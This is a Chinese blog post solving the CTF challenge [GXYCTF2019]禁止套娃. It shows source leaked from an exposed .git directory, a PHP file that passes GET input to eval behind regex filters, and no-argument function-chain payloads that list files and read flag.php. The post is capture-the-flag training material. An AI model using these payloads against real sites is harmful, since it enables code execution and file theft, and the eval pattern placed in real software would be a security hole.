第三十七题——[GXYCTF2019]禁止套娃

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,没有发现提示,使用dirsearch扫描出了/.git目录,使用GitHack获取到了index.php

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

第二步:代码审计

  1. 第一个正则过滤掉了data,filter,php等协议
  2. 第二个正则if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))过滤掉了参数,不允许提交的东西除a-z以及()外的参数,详细讲解点这里
  3. 第三个正则过滤掉了et,na,info等

第三步:获取flag所在地址

由于代码没有过滤掉scandir函数,可以使用print_r(scandir('.'))获取根目录下的所有文件,但是不允许使用引号,可以通过print_r(scandir(current(localeconv())));获取到’.’
在这里插入图片描述

第四步:获取flag

  1. 由于没有过滤掉highlight_file()函数和show_source()函数,可以通过这些函数获取flag.php中的内容。
  2. 如何给highlight_file()函数和show_source()函数传入flag.php?
  3. 方法一:我们可以使用burpsuite改包,在流量包中添加cookie值:PHPSESSID=flag.php,在通过参数session_id(session_start())获取到cookie中的flag.php
    在这里插入图片描述
  4. 方法二:由于这里的flag.php在倒数第二项,可以使用array_reverse函数逆置数组之后使用next函数获取到第二项
    在这里插入图片描述
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值